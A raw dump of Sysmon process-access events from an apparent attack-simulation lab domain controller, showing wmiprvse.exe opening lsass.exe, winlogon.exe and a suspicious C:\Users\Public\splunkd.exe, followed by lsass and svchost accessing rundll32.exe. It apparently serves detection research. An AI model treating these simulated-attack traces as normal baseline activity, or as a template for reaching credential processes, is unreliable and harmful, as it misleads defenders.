15:59:35.256{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4990-6008-2600-00000000A301}3044C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026084Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:35.241{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-498C-6008-2400-00000000A301}2932C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026083Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:35.241{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-498C-6008-2300-00000000A301}2924C:\Users\Public\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026082Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:35.241{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4988-6008-2000-00000000A301}2388C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026081Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:35.241{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1700-00000000A301}1656C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026080Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:35.241{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1600-00000000A301}1536C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026079Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:35.241{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1500-00000000A301}1492C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026078Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:35.241{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1400-00000000A301}1280C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026077Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:35.241{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1300-00000000A301}1264C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026076Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:35.241{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1200-00000000A301}1176C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026075Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:35.241{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1100-00000000A301}1152C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026074Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:35.241{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1000-00000000A301}1160C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026073Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:35.241{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-0F00-00000000A301}1112C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026072Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:35.241{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-0E00-00000000A301}1080C:\Windows\system32\LogonUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026071Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:35.241{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-0D00-00000000A301}996C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026070Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:35.241{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4986-6008-0C00-00000000A301}608C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026069Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:35.241{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4985-6008-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026068Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:35.241{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4984-6008-0900-00000000A301}796C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026465Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:36.991{7901BC46-4985-6008-0B00-00000000A301}85696C:\Windows\system32\lsass.exe{7901BC46-5368-6008-6806-00000000A301}3256C:\Windows\System32\rundll32.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000026464Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:36.991{7901BC46-4985-6008-0B00-00000000A301}85696C:\Windows\system32\lsass.exe{7901BC46-5368-6008-6806-00000000A301}3256C:\Windows\System32\rundll32.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000026463Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:36.975{7901BC46-4987-6008-1600-00000000A301}15362116C:\Windows\system32\svchost.exe{7901BC46-5368-6008-6806-00000000A301}3256C:\Windows\System32\rundll32.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000026462Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 